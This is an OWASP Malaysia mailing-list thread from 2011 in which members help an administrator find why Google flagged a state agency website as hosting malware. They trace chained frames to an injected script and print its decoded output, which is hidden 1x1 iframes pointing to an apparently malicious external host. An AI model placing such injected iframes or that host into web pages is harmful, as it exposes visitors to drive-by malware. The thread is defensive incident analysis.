I still searching for the source.. last week i ask practical student to upload images on the site... after they have finish the job than uncle G block my site.
I have "quarantine" their laptop... :p ** kesian budak-budak IT Malaysia. Mereka hanya di ajar utk lulus exam... On Wed, Feb 9, 2011 at 9:45 AM, Sharuzzaman Ahmat Raslan < [email protected]> wrote: > Please check how the line got injected into your system. > > You need to find the source of the problem to make sure it will not happen > again. > > > > > On Wed, Feb 9, 2011 at 6:53 AM, Mohd Syamsuri <[email protected]> wrote: > >> Mr Adnan thanks for the info and guide.. >> >> I have clean all the mess and the site is up and running again.. >> >> thanks to all too.. >> >> ** I will blog this so others can make it as a guide... >> >> >> On Tue, Feb 8, 2011 at 6:00 PM, Adnan bin Mohd Shukor < >> [email protected]> wrote: >> >>> mamp <= LOL typo.. it should be nano >>> js <= one of hte binary in Spidermonkey. get the patched version >>> http://blog.didierstevens.com/programs/spidermonkey/ and if you are >>> working on MacOS/Darwin, apply this patch >>> >>> http://blog.xanda.org/2010/10/15/fix-for-spidermonkey-build-issue-in-darwin/ >>> >>> thanks >>> >>> On 8 February 2011 17:56, Sharuzzaman Ahmat Raslan >>> <[email protected]> wrote: >>> > I can see 2 interesting apps/scripts: >>> > >>> > 1. mamp >>> > 2. /opt/analysis/js/js >>> > >>> > care to share? hopefully it is open source ;) >>> > >>> > >>> > On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor >>> > <[email protected]> wrote: >>> >> >>> >> Here is my bash history: >>> >> >>> >> xanda:tmp adnan$ history >>> >> <snip> >>> >> 500 cd /tmp >>> >> 501 wget http:/www2.pkink.gov.my/indexsedc.php >>> >> 502 wget http://www2.pkink.gov.my/indexsedc.php >>> >> 503 nano indexsedc.php >>> >> 504 wget http://www2.pkink.gov.my/indexsedc.php >>> >> 505 mamp indexsedc.php.1 >>> >> 506 nano indexsedc.php.1 >>> >> 507 wget http://www2.pkink.gov.my/sedc.php >>> >> 508 nano sedc.php >>> >> 509 wget http://www2.pkink.gov.my/default.php >>> >> 510 nano default.php >>> >> 511 nano default.php >>> >> 512 clear >>> >> <I've remove tags and leave clean JavaScript inside> >>> >> 513 mv default.php default.txt >>> >> 514 /opt/analysis/js/js < default.txt >>> >> 515 cat write.log >>> >> 516 history >>> >> xanda:tmp adnan$ >>> >> >>> >> Below is the output of the cat: >>> >> [output] >>> >> xanda:tmp adnan$ cat write.log >>> >> <iframe width="1" height="1" >>> >> >>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== >>> "></iframe>"<iframe >>> >> width="1" height="1" >>> >> >>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== >>> "></iframe>" >>> >> [/output] >>> >> >>> >> >>> >> Hint: you might use modified version of spidermonkey to 'understand' >>> >> the javascript >>> >> >>> >> Thanks >>> >> >>> >> On 8 February 2011 17:38, Mohd Syamsuri <[email protected]> wrote: >>> >> > thanks for the info.. >>> >> > i will check all the file. >>> >> > >>> >> > how you found it? >>> >> > >>> >> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor >>> >> > <[email protected]> wrote: >>> >> >> >>> >> >> Here is the flow: >>> >> >> >>> >> >> 1) your indexsedc.php has an iframe to sedc.php >>> >> >> 2) and your sedc.php has an iframe to default.php >>> >> >> 3) and in default.php (look at the last 2 lines), javascript will >>> >> >> actually create an iframe to >>> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== >>> >> >> >>> >> >> thanks :) >>> >> >> >>> >> >> On 8 February 2011 17:07, Mohd Syamsuri <[email protected]> >>> wrote: >>> >> >> > can you point... >>> >> >> > my index.htm or indexsedc.php or other file? >>> >> >> > >>> >> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor >>> >> >> > <[email protected]> wrote: >>> >> >> >> >>> >> >> >> you have iframe pointed to >>> >> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== >>> >> >> >> >>> >> >> >> which is not xss :) >>> >> >> >> >>> >> >> >> >From my personal point of view, its either caused by: >>> >> >> >> 1) malware on pc which has been used for ftp/access to the >>> server >>> >> >> >> 2) compromised server >>> >> >> >> >>> >> >> >> you can send your access.log to [email protected] or >>> >> >> >> [email protected] for further analysis :) >>> >> >> >> >>> >> >> >> thanks >>> >> >> >> >>> >> >> >> On 8 February 2011 16:00, Mohd Syamsuri <[email protected]> >>> wrote: >>> >> >> >> > I have check it. >>> >> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy < >>> [email protected]> >>> >> >> >> > wrote: >>> >> >> >> >> >>> >> >> >> >> Hi Mohd Symsuri, >>> >> >> >> >> >>> >> >> >> >> Why dont you check on the reason why its being blocked, it >>> might >>> >> >> >> >> help. >>> >> >> >> >> >>> >> >> >> >> >>> >> >> >> >> >>> >> >> >> >> >>> >> >> >> >> >>> >> >> >> >> >>> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/ >>> >> >> >> >> >>> >> >> >> >> >>> >> >> >> >> >>> >> >> >> >> >>> >> >> >> >> >>> >> >> >> >> >>> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788 >>> >> >> >> >> >>> >> >> >> >> Regards, >>> >> >> >> >> Kishur >>> >> >> >> >> >>> >> >> >> >> >>> >> >> >> >> >>> >> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri >>> >> >> >> >> <[email protected]> >>> >> >> >> >> wrote: >>> >> >> >> >>> >>> >> >> >> >>> Assalamualikum and Good day for my fellow friends. >>> >> >> >> >>> I need some advise. >>> >> >> >> >>> Web site Perbadanan kemajuan Iktisad Negeri Kelantan >>> >> >> >> >>> (http://www.pkink.gov.my) have been blocked by Google for >>> almost >>> >> >> >> >>> 4 >>> >> >> >> >>> days. >>> >> >> >> >>> It said that we host malware on our server Malware Detected! >>> ( >>> >> >> >> >>> Google >>> >> >> >> >>> said that!!) >>> >> >> >> >>> What i did is.. >>> >> >> >> >>> 1. Scan all the data and upload a new data >>> >> >> >> >>> 2. Check the index.html or index.php >>> >> >> >> >>> 3. Scan using web scanner using >>> >> >> >> >>> http://www.avgthreatlabs.com/ >>> >> >> >> >>> http://www.virustotal.com >>> >> >> >> >>> but still get block.. >>> >> >> >> >>> Googel said Suspected injected code >>> >> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php"; >>> >> >> >> >>> NAME="confcontent" >>> >> >> >> >>> scrolling=yes > >>> >> >> >> >>> I have using this code for almost 2 years >>> >> >> >> >>> What should i do now? >>> >> >> >> >>> >>> >> >> >> >>> -- >>> >> >> >> >>> best regard >>> >> >> >> >>> syamsuri >>> >> >> >> >>> >>> >> >> >> >>> >>> >> >> >> >>> >>> >> >> >> >>> _______________________________________________ >>> >> >> >> >>> Owasp-Malaysia mailing list >>> >> >> >> >>> [email protected] >>> >> >> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>> >> >> >> >>> >>> >> >> >> >>> OWASP Malaysia Wiki >>> >> >> >> >>> http://www.owasp.org/index.php/Malaysia >>> >> >> >> >>> >>> >> >> >> >>> OWASP Malaysia Wiki Facebook >>> >> >> >> >>> >>> >> >> >> >>> >>> >> >> >> >>> >>> >> >> >> >>> >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>> >> >> >> >> >>> >> >> >> >> >>> >> >> >> >> _______________________________________________ >>> >> >> >> >> Owasp-Malaysia mailing list >>> >> >> >> >> [email protected] >>> >> >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>> >> >> >> >> >>> >> >> >> >> OWASP Malaysia Wiki >>> >> >> >> >> http://www.owasp.org/index.php/Malaysia >>> >> >> >> >> >>> >> >> >> >> OWASP Malaysia Wiki Facebook >>> >> >> >> >> >>> >> >> >> >> >>> >> >> >> >> >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>> >> >> >> > >>> >> >> >> > >>> >> >> >> > >>> >> >> >> > -- >>> >> >> >> > best regard >>> >> >> >> > syamsuri >>> >> >> >> > >>> >> >> >> > >>> >> >> >> > >>> >> >> >> > _______________________________________________ >>> >> >> >> > Owasp-Malaysia mailing list >>> >> >> >> > [email protected] >>> >> >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>> >> >> >> > >>> >> >> >> > OWASP Malaysia Wiki >>> >> >> >> > http://www.owasp.org/index.php/Malaysia >>> >> >> >> > >>> >> >> >> > OWASP Malaysia Wiki Facebook >>> >> >> >> > >>> >> >> >> > >>> >> >> >> > >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>> >> >> >> > >>> >> >> >> _______________________________________________ >>> >> >> >> Owasp-Malaysia mailing list >>> >> >> >> [email protected] >>> >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>> >> >> >> >>> >> >> >> OWASP Malaysia Wiki >>> >> >> >> http://www.owasp.org/index.php/Malaysia >>> >> >> >> >>> >> >> >> OWASP Malaysia Wiki Facebook >>> >> >> >> >>> >> >> >> >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>> >> >> > >>> >> >> > >>> >> >> > >>> >> >> > -- >>> >> >> > best regard >>> >> >> > syamsuri >>> >> >> > >>> >> >> > >>> >> >> > >>> >> >> > _______________________________________________ >>> >> >> > Owasp-Malaysia mailing list >>> >> >> > [email protected] >>> >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>> >> >> > >>> >> >> > OWASP Malaysia Wiki >>> >> >> > http://www.owasp.org/index.php/Malaysia >>> >> >> > >>> >> >> > OWASP Malaysia Wiki Facebook >>> >> >> > >>> >> >> > >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>> >> >> > >>> >> >> _______________________________________________ >>> >> >> Owasp-Malaysia mailing list >>> >> >> [email protected] >>> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>> >> >> >>> >> >> OWASP Malaysia Wiki >>> >> >> http://www.owasp.org/index.php/Malaysia >>> >> >> >>> >> >> OWASP Malaysia Wiki Facebook >>> >> >> >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>> >> > >>> >> > >>> >> > >>> >> > -- >>> >> > best regard >>> >> > syamsuri >>> >> > >>> >> > >>> >> > >>> >> > _______________________________________________ >>> >> > Owasp-Malaysia mailing list >>> >> > [email protected] >>> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>> >> > >>> >> > OWASP Malaysia Wiki >>> >> > http://www.owasp.org/index.php/Malaysia >>> >> > >>> >> > OWASP Malaysia Wiki Facebook >>> >> > >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>> >> > >>> >> _______________________________________________ >>> >> Owasp-Malaysia mailing list >>> >> [email protected] >>> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>> >> >>> >> OWASP Malaysia Wiki >>> >> http://www.owasp.org/index.php/Malaysia >>> >> >>> >> OWASP Malaysia Wiki Facebook >>> >> >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>> > >>> > >>> > >>> > -- >>> > Sharuzzaman Ahmat Raslan >>> > >>> > _______________________________________________ >>> > Owasp-Malaysia mailing list >>> > [email protected] >>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>> > >>> > OWASP Malaysia Wiki >>> > http://www.owasp.org/index.php/Malaysia >>> > >>> > OWASP Malaysia Wiki Facebook >>> > >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>> > >>> _______________________________________________ >>> Owasp-Malaysia mailing list >>> [email protected] >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>> >>> OWASP Malaysia Wiki >>> http://www.owasp.org/index.php/Malaysia >>> >>> OWASP Malaysia Wiki Facebook >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>> >> >> >> >> -- >> best regard >> syamsuri >> >> >> >> _______________________________________________ >> Owasp-Malaysia mailing list >> [email protected] >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> >> OWASP Malaysia Wiki >> http://www.owasp.org/index.php/Malaysia >> >> OWASP Malaysia Wiki Facebook >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> > > > > -- > Sharuzzaman Ahmat Raslan > > _______________________________________________ > Owasp-Malaysia mailing list > [email protected] > https://lists.owasp.org/mailman/listinfo/owasp-malaysia > > OWASP Malaysia Wiki > http://www.owasp.org/index.php/Malaysia > > OWASP Malaysia Wiki Facebook > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > -- best regard syamsuri
_______________________________________________ Owasp-Malaysia mailing list [email protected] https://lists.owasp.org/mailman/listinfo/owasp-malaysia OWASP Malaysia Wiki http://www.owasp.org/index.php/Malaysia OWASP Malaysia Wiki Facebook http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
